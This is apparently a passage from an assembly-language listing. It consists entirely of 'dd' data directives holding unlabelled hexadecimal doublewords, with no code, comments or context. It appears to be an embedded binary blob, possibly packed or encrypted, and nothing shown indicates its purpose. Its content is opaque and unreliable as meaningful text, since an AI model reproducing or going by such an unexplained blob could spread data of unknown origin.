		dd 7D07310Fh, 94B73295h, 0EFF55700h, 81F9DA51h,	0D3EC5B59h
		dd 4314F8FBh, 0A6F333F0h, 0A6B2ABFFh, 44C98589h, 7C2F4E4Fh
		dd 0D7669C7Eh, 0F9E73500h, 0D8BF76CBh, 2C94CD56h, 0E1A33A56h
		dd 38B246CCh, 0BDAB75EBh, 0E040B08Fh, 0AB45F983h, 0EFF69DF1h
		dd 81F45367h, 1438DB25h, 0C5B66B78h, 6CF7B32Bh,	0AA5270BBh
		dd 62A4D2B2h, 11B8C997h, 0D72F8B67h, 8AF23A26h,	41977495h
		dd 0BF7E3980h, 851AD302h, 0E752C91Ah, 41FAEC77h, 44E6BD3Dh
		dd 3C3F1C65h, 6AF1FF7Eh, 922C7E37h, 0D11C9D56h,	2727E51Ah
		dd 28DE9828h, 81493E20h, 7517CB3Ah, 0C4D4E183h,	0B019E3CEh
		dd 934DE6EAh, 0E95D7029h, 0E3C04B1Eh, 32EFC161h, 0CFB43B7Ch
		dd 37FA676Dh, 29C145EBh, 0A607C384h, 0E665AF61h, 3CE1681Fh
		dd 9EF85BF9h, 8A44C3F1h, 4CD213D6h, 3D54290Eh, 0DDCF94CDh
		dd 33EFE86Bh, 9ED2EFC1h, 0D065933Dh, 0C1AAC58h,	0C9A438FFh
		dd 0EE7AC375h, 0D0D9C93Ch, 56B627FAh, 8127A5E3h, 975F53E5h
		dd 0C8E8A82Fh, 0BE8D2A82h, 80CB29DFh, 466D7574h, 4A550E1Eh
		dd 30B3574Eh, 382A6059h, 80F37990h, 0DA29A6C4h,	0CC3E20EFh
		dd 77CFB6Ch, 9F06B0D3h,	3A8C2DDEh, 0BBA00339h, 5736792Ah
		dd 0CB30F3h, 0C6F0FCB7h, 79816D0Fh, 0A5963EE1h,	4085F067h
		dd 0C5AF099Bh, 0C5FFDBCFh, 0F81817F8h, 0A4FED44Bh, 4E1F6C2Dh
		dd 0B30ACFECh, 2492DFACh, 38AABF03h, 0B2CC0C6h,	15AB8DA9h
		dd 0B9DCC701h, 812ED166h, 0F398E2ABh, 4AD4129Ch, 0B54399B5h
		dd 9F713545h, 0A771F0F9h, 1198834Eh, 917F85F3h,	65747E03h
		dd 0D4F07930h, 60E37DA2h, 0A3D03624h, 6DAEB124h, 0A530BD99h
		dd 9BB85346h, 968F551Fh, 0CE6DAD3Eh, 0A5662579h, 0BAA12E79h
		dd 3A17A6AEh, 0CC308892h, 32EE1C8Ah, 2CACB81Ah,	0E78B33F1h
		dd 99C61F83h, 8BA9B3B2h, 0FAD2CBEEh, 56387C11h,	74F5E475h
		dd 2BC45C0h, 0C22032CAh, 0CA1545DBh, 88EC3977h,	5F52AD6h
		dd 95E7D0B6h, 0D5320938h, 0F00E586Bh, 0E2D08EFEh, 9CABD36Dh
		dd 5563FE67h, 1E364481h, 12DF3521h, 0E92E2E0Eh,	4BE80344h
		dd 0B29EFC15h, 0AE5F013h, 9BC8B56h, 464E2363h, 53741F5Bh
		dd 0BCD1CAD1h, 0D6C6A54Bh, 8259A8B3h, 0C99533CAh, 6544C3FAh
		dd 0B9FE8CF4h, 0CA85E2E2h, 37EAC652h, 9932A2DFh, 0E3D2AAC4h
		dd 0D3C1D02Dh, 0FC34DBB8h, 0BF6F2530h, 6ACAC6D4h, 0A35B491Ch
		dd 8AB5B23Ch, 0E0F51781h, 5B001A63h, 35744395h,	51AB37Bh
		dd 65298F65h, 6EE3AAB2h, 0DE54E313h, 64E970A9h,	0DB1BB852h
		dd 0F697D9D1h, 0E6943286h, 2D6F7D9Ah, 0EA1786AAh, 8BF003EBh
		dd 0BE5D89FDh, 3B4FCD7h, 0A387D313h, 332E7CA3h,	5E59768Eh
		dd 3F078EBCh, 1CC20E44h, 0B2478F33h, 2831FC3Ch,	7D6550F2h
		dd 0A51AA564h, 0E8305671h, 6D1E2486h, 591C3F69h, 98EB85ABh
		dd 0E1CAA028h, 0DE405EE2h, 0EF56BAC3h, 6BAD33B0h, 9C0F49C1h
		dd 5F713F19h, 35D21E98h, 45280276h, 0F6B0946h, 12881D67h
		dd 8AE7A096h, 27ACF412h, 9F2D832Fh, 0AE620AB8h,	0E54DA285h
		dd 358871BBh, 0C90EC56Fh, 0D484DBCDh, 8F73257Eh, 0E51E26F3h
		dd 0D531903Ah, 0B9EA8B5Dh, 312C51CDh, 8DA3BD99h, 8AF31D69h
		dd 0F9677B5Dh, 0C9B10A18h, 3B9F2EF6h, 15D37FF7h, 5AE95477h
		dd 0E79865E7h, 704E4AF2h, 695B671Dh, 0FF296B24h, 0B6FEED6Ch
		dd 6E719D06h, 73944E61h, 973EE5DCh, 0BF99F2FCh,	7649C629h
		dd 4E96E964h, 561FDBEBh, 7A3884E7h, 94068A82h, 0B5435F5Fh
		dd 0B2EEA5AAh, 0BD809A99h, 5896409h, 0AF6BCFA6h, 8833E898h
		dd 0EB4D4D91h, 0D8D63906h, 0C2AF9432h, 0EC3539ACh, 0C2CD50DFh
		dd 5715D98Eh, 0DDAF159Dh, 0B303C209h, 0DD3D02C7h, 0F958C09Eh
		dd 2F43123Dh, 29664E32h, 607C5D37h, 946CE2EEh, 0BAB833E2h
		dd 6CD16143h, 9F9DCEE3h, 7C302197h, 7971CE70h, 0FC0F8918h
		dd 54CC7E90h, 0C03117Eh, 3CF307DEh, 9CFB1135h, 8AC3FF47h
		dd 0CCD39D00h, 45A2C366h, 620DAE70h, 552409FBh,	9295B0DAh
		dd 0AF971192h, 0B7DC24BAh, 0C3FB252Bh, 0A60A370Eh, 0B44872D7h
		dd 0D743374Eh, 83C4784Bh, 0A49D7C5Fh, 0E78C66D7h, 0B166144Ch
		dd 1B6643E1h, 0CA665769h, 81F3F5F1h, 28463567h,	6BDAB83Ch
		dd 25CD07D5h, 0DEB8C8FCh, 0F6AE453Eh, 654508F2h, 0B39270FCh
		dd 0E797EE65h, 2C039C0Fh, 943F3C9Fh, 90615A4Ch,	0B3F00EAFh
		dd 59EE13FCh, 5D327CE2h, 3593FA91h, 1957A8EEh, 9F59FD8Eh
		dd 1F8BBDD5h, 0D4A8ABD2h, 56E48DD3h, 56B48E5Fh,	0BE0F67FFh
		dd 724D4BA5h, 1DD13AF5h, 4BFDE93Bh, 0BA2A7E34h,	0A01FA4AEh
		dd 0ABDACDADh, 7A32F3EDh, 0E2B9057Bh, 0F785D350h, 5A27D386h
		dd 545D0DA9h, 8660323Eh, 32C6C298h, 48E67C50h, 0F3627D40h
		dd 499A8579h, 48E41872h, 767BE82Ah, 6850110Dh, 2C50E52Fh
		dd 0A40E9A6Dh, 0DB3FD0CDh, 0CAA8063Fh, 991C020Ch, 6A2E01Eh
		dd 280780BCh, 2C95FA7Ch, 0A55FB684h, 9D12735Ch,	0E5C208F2h
		dd 59D65970h, 3713759Dh, 0ACAAAE7Ch, 0D1CF4654h, 0B1A2AECEh
		dd 0F80BAAAh, 5EA796ECh, 0AE79FDDFh, 8BD26066h,	49BDB3F6h
		dd 103BAA3Dh, 0E3ACD533h, 0F33C98B1h, 84E6E07Dh, 0E12AD41Bh
		dd 46212D6Eh, 3D2BA5F0h, 0B7A1ABD0h, 0F0FC30AAh, 8CD36D31h
		dd 89AF27BBh, 0D805736Eh, 546D0A68h, 0CC33F3C4h, 411183Eh
		dd 0A46144B1h, 9DAFE25Ch, 4CE84308h, 0DB68AAAh,	84F3AA90h
		dd 0F20D7D19h, 71C959ADh, 45F197Fh, 90C7FEB6h, 91C79DD8h
		dd 0AE2C7920h, 0AFAEDA61h, 11BD9B96h, 0CE1DF73Ch, 649A6D49h
		dd 0D9DBF245h, 0DF1A351Ch, 944E9F07h, 21AD0449h, 5133C2C5h
		dd 9D528451h, 9FAB309h,	0EC7B16C9h, 2D2357E1h, 231A093Fh
		dd 910258E8h, 5BAC8CBBh, 0D9DE7AE6h, 0E87307D6h, 0EE315857h
		dd 0DEB14513h, 67350D14h, 68A6BC3Bh, 790856AFh,	27D656AFh
		dd 0D519DFCEh, 0DE5CA8CAh, 0FC01EA4Dh, 76ABFC47h, 0DFBCD8F5h
		dd 312E0FC6h, 3B816B62h, 0E97C6FE3h, 715AECEAh,	74D5C3Eh
		dd 0F28F0BB5h, 24346222h, 10FC2B12h, 0A2B21BADh, 0B07976DFh
		dd 0F58B9E7Bh, 183FEF1Dh, 0E7E6E215h, 5AAA2F57h, 0CC5FC67Eh
		dd 0CDC04AA9h, 36DDCE37h
		dd 4D5BFE2Fh, 0B044DAB5h, 0A2FDE84Fh, 0EB47906Ch, 0ADDFE310h
		dd 1E296BEBh, 56F83D4Dh, 0F178A77Bh, 29CCB60Bh,	60D292EAh
		dd 23604E8Eh, 0DB99ADFAh, 5267A26Eh, 6D178931h,	0AA46B397h
		dd 0F2EC078Eh, 7F53378Bh, 0DF081A5Ah, 56725015h, 0F2ECD42Dh
		dd 9CA39620h, 0CC480419h, 16E527C7h, 3FB1D0AEh,	177CD99Bh
		dd 627FED39h, 66685B98h, 6691A1D7h, 293E11A3h, 864716BCh
		dd 0E4F8B3Ch, 81FAC9BFh, 84CEBE62h, 59C98F81h, 0C6523D1Ah
		dd 548B5B9h, 59F58ECFh,	11ED4127h, 91DB2C5Ah, 763B5644h
		dd 2D4988B6h, 0C410467Fh, 9791E4A8h, 0BA1A7F15h, 80DAF7E1h
		dd 0D95F9F3h, 0C8F830D3h, 1722F9E3h, 0BC225AB0h, 0E092FE9Dh
		dd 29E09DE7h, 60D88B9Ah, 0D3ADF346h, 0AC1988Ah,	181EC6C3h
		dd 0B598EABAh, 195F165Ah, 0BBDACD25h, 265E4932h, 0E10C18A3h
		dd 5485EAACh, 0FF6EEABFh, 7CF48254h, 7156B7Fh, 937ED779h
		dd 86D13DC4h, 6EBC1500h, 89E0CAFEh, 281CDB97h, 0DAAB5A61h
		dd 0F198C69Dh, 0DA5B39E0h, 34CBBE3Ch, 0C4632617h, 0AC38D91Ch
		dd 0BDB2A40Bh, 9B349CC9h, 0FA0B9F8Bh, 661EE77Fh, 0B91F4394h
		dd 0E2507383h, 9A035FC9h, 0DE863ED4h, 9D5A9702h, 0D5354777h
		dd 955443B5h, 0C631D163h, 9CA6331Eh, 33EDAF96h,	0AB6D758Eh
		dd 0B0AFB583h, 3AD5D5DFh, 0B10973F6h, 162A757h,	0B34ED507h
		dd 9556BAE0h, 0AAAA419Fh, 0F3D4B2EAh, 7199FDB7h, 5248DC55h
		dd 8B0117F2h, 5BC91C6Bh, 0F299561Bh, 0F1FED385h, 2C4BD20Ah
		dd 611D0FCAh, 0B649F0CEh, 9F4A1D1Eh, 0E9554236h, 3D04DCADh
		dd 7DD5C1D5h, 3EE9C0F2h, 2BC83E83h, 8BE818FDh, 0CAEDD866h
		dd 376987F8h, 9D16F0B1h, 0EF9679BBh, 43F93BCFh,	0C7147DF4h
		dd 67AF7D8Fh, 965617DBh, 5DE25D69h, 3B95A4D1h, 632F8C25h
		dd 0D160AFF0h, 32FE64ACh, 0B462A1DAh, 42B59C3Eh, 0D15976AEh
		dd 0F6A63E98h, 26D650AFh, 2FE86F5Ch, 0EF442FD7h, 309683CBh
		dd 3503D98Ch, 0E0F7A3B4h, 0A7CA06DCh, 0B4501AF8h, 47C96756h
		dd 88CB60FFh, 6CBC4676h, 6903A7C6h, 0FD35FEDAh,	0DAE07969h
		dd 1F00734Bh, 91DC2576h, 0B70A125Fh, 0B3E6F058h, 26AED0F0h
		dd 0B4763C8Ah, 949FFC0h, 0AF70E8ABh, 0ED257296h, 0E64222FDh
		dd 0F69F27B2h, 152D9EA9h, 7D1AF8D2h, 0B21FCB53h, 0C0F49DE7h
		dd 0FDAE595Fh, 0FEBE6D56h, 69B4052Dh, 92F74D55h, 4EB0D615h
		dd 578F1779h, 0F3745D95h, 0DC9D7BABh, 0BA3DEBD1h, 0C0A9EB63h
		dd 0F8BFE928h, 9A6DAC18h, 7BE64C9Bh, 0A5B5E898h, 2D0D2C4Fh
		dd 2C27CA05h, 8087069Eh, 0D0467357h, 25C9E36Bh,	18CFB312h
		dd 49946639h, 53DD2F7Eh, 59661599h, 827F8ED2h, 0BB26EBD3h
		dd 0A2E67AEAh, 3C91E91Ah, 0DA7D58AAh, 0AB5661B3h, 0BA65B03Dh
		dd 0B98727B6h, 769D857Bh, 0CED1FBA9h, 9DCA1E0Dh, 0BA2D3027h
		dd 51B3EFF5h, 0B75ECDD5h, 85A2A372h, 54DC5CAAh,	7816BAE7h
		dd 1BC19238h, 45F907E5h, 3DE8FD77h, 142E5153h, 9562A17Eh
		dd 0E34AFB65h, 0EC41E24Bh, 49817EF8h, 78B7B55Eh, 5CDCF1EDh
		dd 7705F762h, 0B4455323h, 0E7654BB8h, 644E3721h, 55AFE782h
		dd 8B4B7590h, 5430371h,	5366C2B5h, 59017780h, 1720A057h
		dd 1C173975h, 60A5052Fh, 0C48BA2FAh, 0C91CE0F2h, 0D24E4A77h
		dd 0FB9526C4h, 9E32BECCh, 87303F73h, 72B76CE6h,	0EBC6D80Dh
		dd 0C00C8ACCh, 0E8376EB0h, 240F8414h, 0A4B79776h, 0C452E10Ch
		dd 645BB0Fh, 0B5E70EFh,	7E454EC9h, 0F3678F2Bh, 0E6C68B43h
		dd 774E4682h, 153F6385h, 797C7F4Fh, 2D894BC0h, 0CB304824h
		dd 0A33898CDh, 5049F742h, 6D78B0B2h, 71FE3E75h,	4B051870h
		dd 48C8D963h, 73C62677h, 0C7E3DA34h, 0D5B16A9Ah, 0EF9F5DA6h
		dd 0E63B1E9Ch, 0E8A2F586h, 0DF80C4A9h, 48626AA8h, 0FBE86CDh
		dd 0E84F7DDEh, 36310F81h, 157F5B6h, 0BC9D5359h,	86D8668Fh
		dd 0D4763B47h, 62E5F432h, 0F85833CFh, 4603DA46h, 0B6D11FCCh
		dd 279A9D9Bh, 9DAB4171h, 0E59533Dh, 2E2F751h, 0ACF3BB2Fh
		dd 0AAC8CB19h, 786565BBh, 0A026F233h, 4B9ACC3Fh, 11B399C6h
		dd 797FDF07h, 6A9533B5h, 0E0E19F3Eh, 6F258D87h,	0BF0A8AA9h
		dd 5D65DB84h, 123097D1h, 4150C25Dh, 68390A0Fh, 0A712BDA5h
		dd 0FA42100Eh, 744F91B9h, 40F97405h, 2518ADEFh,	51277FD7h
		dd 0BFD58651h, 80CC98C4h, 9F8B6E63h, 86E9E80Fh,	399F97EBh
		dd 0ADD3720Dh, 6F034F29h, 0DAF66844h, 0A584FED7h, 88289900h
		dd 7324D59Bh, 0E9ED54EEh, 0F05184E7h, 0FDAB997h, 77FFA47Ch
		dd 45DBB64Eh, 6829FEFBh, 64BA4EAFh, 95879569h, 0C540F03Bh
		dd 0C3469FE3h, 7653C5DDh, 51C287C4h, 0C6E8DAA6h, 1E4EEADFh
		dd 47EF0C56h, 5B3D3946h, 0C81DDF41h, 0FF49AABEh, 0C8250A40h
		dd 0CFA91776h, 0BE139FD9h, 3A525167h, 716687Eh,	9EEEAF51h
		dd 309D637Bh, 0F9F79A49h, 18AE540Eh, 0F65876B9h, 78AB71ECh
		dd 4555FEB9h, 87E36B67h, 0B3E8466Ch, 0FBA2782Fh, 50869A83h
		dd 9AA73096h, 4C552003h, 45FBDBCCh, 0AA350B11h,	0FFBA9628h
		dd 265D1439h, 278D4A37h, 9CC8E14Ah, 94558CC3h, 255F1A0Dh
		dd 0B131E231h, 3753AC0Dh, 0E64DE4E1h, 0DE2BB573h, 704AA725h
		dd 49F9582Bh, 0D77CA065h, 1B7C6B20h, 231D517Ch,	19490F3Bh
		dd 4514B35Ch, 4FF02D52h, 6F674F5h, 89F03E6Ch, 0D49087B8h
		dd 64EA9F17h, 0C2A67D55h, 0EC21029Bh, 0D8291B6Fh, 0DFCDF3A8h
		dd 68B77E9Fh, 0E44BF40Bh, 18AC106Eh, 0E6A395D4h, 0A6752C0Eh
		dd 0EE3370D8h, 5BF089AAh, 0D87AB42Ah, 393BFD31h, 566B6DCh
		dd 0D2CABC40h, 6C3A873Bh, 0C2E2C6B9h, 67E5EAE6h, 464345DCh
		dd 1351AFDEh, 0FA3748B5h, 0BB886F8Dh, 49689BF3h, 9A289726h
		dd 71F7C056h, 25D46CEFh, 0ED138F1Ch, 6109E070h,	0AC7DA7E1h
		dd 0AE2A7231h, 178811BBh, 0FABABA20h, 0DBD5B039h, 4CDC270Fh
		dd 0E579F3A2h, 21F8A557h, 0D5D49912h, 570A1946h, 349F8265h
		dd 0FD87C465h, 709F0FEh, 578B7DBh, 9FB17441h, 9F5DF74Bh
		dd 2EAB8F46h, 3B58CE62h, 95A382F9h, 3ABB73B5h, 966DD86Bh
		dd 0E2CB1AA3h, 9E78AFD0h, 0B19C23Ah, 0B54D5BB3h, 7CCFB4CBh
		dd 68A31B96h, 56F576A9h, 0C2E17FF3h, 0DA92CF8Eh, 0E01A8FC2h
		dd 6114B2B2h, 1BE2E3BEh, 357F7AC1h, 0F465E07Ah,	0B4ACE5AEh
		dd 0D17525Ah, 0CCCED31Fh, 287AD6A9h, 229BBAA2h,	0D1AC3D30h
		dd 907AEB3Eh, 0EC15824Bh, 0CF34646Dh, 0CB3674ABh, 0EAB39559h
		dd 440D70FCh, 0AA935C2Ah, 0AF7745BAh, 5393CA8Ah, 0DDF69CF5h
		dd 0F1CA84C8h, 9F1B781h, 309EB15h, 0B1327F5Eh, 0FE1701B9h
		dd 22BC5737h, 13A3D3E5h, 0C2E9187Eh, 73C98F62h,	0AD74E5A6h
		dd 48D90B86h, 0B8FE56D7h, 332942DCh, 8C504ADh, 1576E825h
		dd 0C6CB58B2h, 8F5F4B9Ah, 0EC13C9CAh, 53196B26h, 0CBD5F8Ch
		dd 7D9C7164h, 48A8F901h, 0F01A9B1Fh, 2F1921C1h,	0BF1F7CB9h
		dd 0E84AFE1Ah, 9F3599E5h, 0CF7AFDFBh, 5BB22FC2h, 0C55367D5h
		dd 137C39BBh, 0EE7AA138h, 0B38A43A4h, 8AF0DC4h,	5D9CC7F5h
		dd 6D632ABDh, 670BC9E0h, 602D3D69h, 46DCB29Ch, 4C5C5765h
		dd 1A048431h, 0BACF3F14h, 7A5E0DC8h, 6843D59Ch,	951A50DEh
		dd 92A0FC4Dh, 0A0D89704h, 71618F76h, 4F32955Ch,	0BDA268CEh
		dd 0ADD73FCAh, 78F05326h, 0BB4AC974h, 0CE96B9EAh, 0D440319Dh
		dd 79CC1CBCh, 0BBFBA8C7h, 0AED7585h, 0AD49E2D4h, 0BD6BFBCCh
		dd 0E6600B9Fh, 0BBA4CE07h, 0FDEB60E3h, 0BE04508Ch, 751AE1B5h
		dd 0C15A2FFFh, 0DFB7148Ch
		dd 659E103Eh, 0CC98B8AAh, 627C9A9Dh, 0BF2EEBE2h, 79308BB3h
		dd 0A09657EDh, 99C0369Fh, 1F5425B2h, 80ADFDFCh,	0A2570A1Fh
		dd 82651C6h, 759DCA0Bh,	9676E4BCh, 462383EFh, 7E1D0A4Eh
		dd 0CB750506h, 0FBEC6E35h, 46D6EDD4h, 0F2D6953Bh, 0D7780533h
		dd 7C8DE471h, 588963BDh, 41458E75h, 0C93EAE96h,	8F42E4CCh
		dd 1A522275h, 312F2415h, 93F20F20h, 0CAF41631h,	0A8370F1Eh
		dd 0ED5C168Ah, 2C6B6B39h, 1F230190h, 0A3591799h, 9C4C03D0h
		dd 875CE53Fh, 26B74739h, 793967AAh, 72917CEh, 4C91B70Fh
		dd 91ADEC77h, 368E290Bh, 9B2BC1AAh, 5DB59E1Ch, 5BB4C4BEh
		dd 0A25B221h, 0D743486Bh, 8C33E9E1h, 114CF1BCh,	0B4CEC8Dh
		dd 46B60FF6h, 0FDBD22Fh, 99CB1E61h, 64B2117Dh, 0D2D1E075h
		dd 36E2751Ch, 232395B2h, 7D249BB8h, 0B46401A5h,	0B917AB13h
		dd 927FCF29h, 60CBDC95h, 0CA2CBAC5h, 0C9BE5DACh, 7782E90Eh
		dd 7C5C6C49h, 0D289B6BAh, 0C7B222EAh, 750105AEh, 8340605Ah
		dd 0ECF4EF1Ch, 0DD15DC9Ch, 625F914Bh, 0B6E8F683h, 0D56FB576h
		dd 78DD3B83h, 57928DE0h, 11C7185Fh, 0A6AFECB0h,	5DC142C5h
		dd 0CE782AD7h, 0E18FFCB1h, 0F99076DCh, 3129687h, 0F533743Ch
		dd 6374096Dh, 0A7172707h, 8FB5EFD8h, 0C91D2AE9h, 42B2E377h
		dd 35CA2A8Eh, 0F245ADE7h, 0CA7366A4h, 71972C73h, 6B694C04h
		dd 0F3AB12D8h, 0B7F5DC2Fh, 53DF6879h, 8A4DDE2Ah, 3F759003h
		dd 0AC8EDE7Dh, 9FC60FDh, 0DDF8955Dh, 51C1BC45h,	0A2BCDADCh
		dd 25DC91CBh, 0A0AE8886h, 83C02EA6h, 5A9E24B7h,	0BE688831h
		dd 19391DC5h, 1EF04BD4h, 7AC94D80h, 3EE2ED4Eh, 0EB46FCDDh
		dd 98942690h, 1FDA8E27h, 0B32BB932h, 95788E4Eh,	86A19AFEh
		dd 0CC46A14Ch, 0F8BC71C4h, 36736D1Bh, 0F6A55FD0h, 5C999252h
		dd 0EF5B5A09h, 82B4956Ch, 2D7C83C8h, 62634E76h,	2CAC0C03h
		dd 856B1B07h, 0B3964BE3h, 75F2AD1h, 0CC411CF8h,	0A1C1BF9Ch
		dd 34371ABFh, 0A8DDE33Eh, 0CFD1CBBCh, 1ED429FEh, 13D65622h
		dd 0E547D357h, 7F8D5579h, 64B4320Ch, 6232F15Ch,	2948D1AEh
		dd 583CBA8Ah, 0E1BC5CC7h, 0D0C077BBh, 0DE58E64Bh, 9392F8E9h
		dd 193D6DE1h, 2C7D46CFh, 0D415DEBh, 0A2328D2Bh,	0F59AC0F3h
		dd 38CF482Fh, 0B85A737Bh, 32F74096h, 0B55CE90Bh, 0AF407579h
		dd 0E6413BE4h, 0AE16ACE2h, 273F5166h, 0FA32D87Eh, 22C90771h
		dd 670ECAAAh, 2B2702E3h, 0C7E34619h, 0FEC28E11h, 0B2A91BCEh
		dd 547EE1AFh, 0AFFA7A79h, 0B7156CB5h, 645F4873h, 9297C85Ch
		dd 0AFC87E89h, 37978C6Ch, 0E9F85FBBh, 0D55E9375h, 365CF9D3h
		dd 716D724Dh, 0D670BE58h, 0C9C85107h, 0FC508179h, 30F03870h
		dd 0EB01F243h, 0B38439B3h, 10C396B8h, 0AC970241h, 646EE6A7h
		dd 0F45E35DBh, 0DDC53181h, 5315FDE5h, 0FB949CE9h, 0F2D741D2h
		dd 0FBB056C0h, 8647CB81h, 0ED83C0Ch, 0B1FBB28h,	7AC193BDh
		dd 0CBA8D51Dh, 65A29757h, 88AE2543h, 0D4DBC769h, 86CDA328h
		dd 89337DBAh, 0EC0FE9D6h, 36C50792h, 77656313h,	57BE36F5h
		dd 0B1BBF5B5h, 5B51B966h, 0B8E6F3A5h, 0D0E36FE9h, 1682EBF1h
		dd 15317DEAh, 0F065B63Bh, 4C1B4EA6h, 58C41ED7h,	0CB7171C9h
		dd 77B3CAC3h, 26FB4EB4h, 577E0D71h, 0C79F5C11h,	0A2858B2Eh
		dd 0CD0EA697h, 0ABC823CFh, 496AE0ABh, 9F3B50C6h, 9D268D86h
		dd 3BECF6C9h, 0BB61B866h, 0F2C5A804h, 0F0EE23C3h, 2735B696h
		dd 0C0FFED05h, 0C5AE944h, 4BB87BD9h, 6E66F6D5h,	797ABB8Eh
		dd 0CD038593h, 3C21C7F6h, 9AE78FCAh, 9F71B0BEh,	0D95DAE55h
		dd 4F3D8F22h, 7C61E4D4h, 0BE113559h, 0B9977AAFh, 0E65DD85Fh
		dd 0D7322383h, 0D483B7F3h, 0CBED95F3h, 0B33A853Eh, 25CB2382h
		dd 2E70DC0Ch, 63A527B5h, 22BAF4AAh, 69A56049h, 0A83C083Fh
		dd 957516A8h, 77E244A0h, 0E4148702h, 0E480AA15h, 0BD7B8663h
		dd 4076619Ch, 7120B0ECh, 149DB167h, 55B38EA2h, 6673CB83h
		dd 0A4A087CDh, 0C9C9B742h, 1320E169h, 0BFD34F5Ah, 5733BB96h
		dd 0BB85CFB0h, 85A7BB46h, 0EF3D70BBh, 56216C1Fh, 0DE6F20BEh
		dd 0CEAD0F6Dh, 8C8C756Ch, 886306E5h, 0B68B208Bh, 66614D7Ch
		dd 0AC1AFE75h, 9AF73CF9h, 4F79ACF0h, 8DC558C7h,	46219646h
		dd 0B5C6E907h, 0B59DBCB4h, 0C184093Eh, 34F66E31h, 0CD75C2F3h
		dd 50BF5693h, 0C4C7EF60h, 5A9C1B0Fh, 9A6C38C9h,	69FDDABAh
		dd 57ADAA61h, 729B2759h, 0B3B84C37h, 199ADF4Ah,	5A4B9A37h
		dd 9CAA5FE7h, 171DA608h, 876B243Fh, 0D3337684h,	3075C6D2h
		dd 0B73F27B0h, 0CC7A8B30h, 8E3F3F3Eh, 6B177E3Eh, 3B10ACA7h
		dd 896E05E6h, 6B8CAD6Ch, 365B2A1Fh, 0D4264591h,	7C40DEABh
		dd 8A914089h, 13E8C226h, 8A1981E1h, 58C84CB7h, 95534C56h
		dd 346CEA7Eh, 0D6FE314Fh, 0D6FAE602h, 8FF68B51h, 0F0DEDE27h
		dd 2FE1B33Dh, 64191E6Eh, 4F568D9h, 0B92D2F6Dh, 6D169133h
		dd 21C9A1C2h, 7E9769B8h, 1CD3A7ECh, 6844A774h, 0F24BFB13h
		dd 5136CDE7h, 0CF86B442h, 713E768Ch, 88C51075h,	42A020BCh
		dd 7F65059Ah, 46B0C621h, 5DD300E9h, 7168EEF8h, 0C6273174h
		dd 0D95FBD58h, 2A03AB9Dh, 42AABA3Ah, 2C9757BBh,	524998CBh
		dd 0F86B1C36h, 8F361D11h, 44E14ABBh, 0B5C3042Bh, 768F2E72h
		dd 0F5465D3Bh, 4FE68E5Ah, 0C72F74CCh, 0CF8ABAB9h, 3C28CA3Dh
		dd 462D5138h, 22F5701Eh, 0BF3056C8h, 0EA50494Dh, 2934FC66h
		dd 6315EE7Ch, 163969A8h, 0AD2B25F9h, 40028B13h,	46CC2553h
		dd 0FD5EB4A1h, 5047F47Eh, 0E87E0F29h, 0C9D0A8F4h, 0FE2E3C95h
		dd 82D1EE69h, 3B0B2B88h, 9F51DBDh, 7A442136h, 0D3AE5BE8h
		dd 27106388h, 0C6C66320h, 60978F9Fh, 80A54A48h,	0B3BE7B3Ah
		dd 3968BAFCh, 0A9277C2Fh, 0C4BE6320h, 0AFF955BDh, 0A37FD4EAh
		dd 0D8FAC6CAh, 4E81FEFh, 0DF092C53h, 0D68ABBFFh, 126C7594h
		dd 9EF9E72Dh, 7F96745Eh, 5FDF3415h, 41755B26h, 0F6FA1AB0h
		dd 0CA0665FEh, 9D65A436h, 0A79A1CDEh, 0D676E856h, 9F93630Ch
		dd 270BC73Fh, 8CBD111Fh, 8729398Bh, 0ABF9BF54h,	956AE688h
		dd 353AB11Bh, 7215579Ah, 0DB7E4F9h, 0D64171F1h,	0C26BD152h
		dd 978EC83Fh, 1CFDE4E0h, 694754EDh, 0ED379361h,	360AF52Bh
		dd 716EC536h, 0C0F277A2h, 979CC43h, 45771ACDh, 0B412A8D6h
		dd 0E34EFBDDh, 0EE0FBB93h, 9979257Ch, 8EE69627h, 0DFB722BEh
		dd 0CB45B896h, 7939B750h, 10D8A3F7h, 642A0D1Bh,	9F9D1E7Dh
		dd 0AAA6D4AAh, 0B9BB1F8Ch, 169932C4h, 992CFC6Ch, 0F040A97Fh
		dd 4524F7AFh, 0DA7A422Eh, 0E09FB345h, 7D534D92h, 6F6D2AE1h
		dd 0C6E11CB1h, 85E53922h, 0F351F88Dh, 0A0B895A6h, 0C4568E61h
		dd 6749B02Fh, 0BB6AD5D3h, 0A075DD47h, 62B62FEh,	28CFE2DEh
		dd 8CEE82D5h, 434925BDh, 0B5752A8Eh, 95AAEA75h,	94C01EC7h
		dd 0BBB96AC7h, 5AF2F5A3h, 3A2A1E55h, 97672317h,	89040FBDh
		dd 6688FB1Fh, 40A6891Dh, 0A7DFA4DDh, 99EA0D77h,	4BD48B8Ch
		dd 0AF1558B8h, 0F46539DDh, 0C3F1C505h, 0AD98F8E7h, 6ACFAAFDh
		dd 0DA381E37h, 0FB50229Ah, 90439D66h, 0EE4796BDh, 5585BF97h
		dd 0C37884D6h, 0A81F6270h, 0BBD8EBBBh, 3AD122B0h, 85A38DEAh
		dd 0F3C2693Bh, 85295B97h, 53DB276h, 803A0A3Eh, 0D1A30B72h
		dd 5E294161h, 7E5F8CA5h, 0A6D34F97h, 5336952Dh,	7E99F129h
		dd 0D60ACFF0h, 0F57BCF25h, 0C09ABD93h, 0F67AA3C1h, 61BBBFEFh
		dd 85EA2E6h, 0B17F5FDCh, 806DCE57h, 5A3828DBh, 0DF376A82h
		dd 355C65A9h, 18CE78EEh
		dd 5CF02EB2h, 0C83A440Ah, 9A73A6D3h, 767F353Ah,	81B4092Eh
		dd 0CAE31B65h, 465358EEh, 5F53869Dh, 0D2A0C81Fh, 1DDA966Ah
		dd 61C6E0F2h, 98A88D41h, 570AFC5Eh, 45AD43B9h, 0B19816F6h
		dd 0E9361382h, 3E8C2B88h, 3ADDFC48h, 4205511Bh,	85677954h
		dd 886EC62h, 2DD85FEFh,	79532076h, 2CA4B961h, 788E5667h
		dd 2278C66Ch, 894D733Bh, 494D8646h, 41219469h, 0DE5B36F1h
		dd 5F3838ADh, 22BB8BD5h, 8DC90B1Ah, 0FC5276B8h,	9C0881Ah
		dd 9EFECA96h, 0D4483528h, 0D0461D72h, 0B2BC553Ah, 6F77C70Eh
		dd 13D11419h, 41155D8Fh, 37E4DAADh, 0DD790AB3h,	0B18ADFAAh
		dd 48D36798h, 64DC7DBAh, 5D6597EAh, 0FA2FE5BCh,	0F7D4F670h
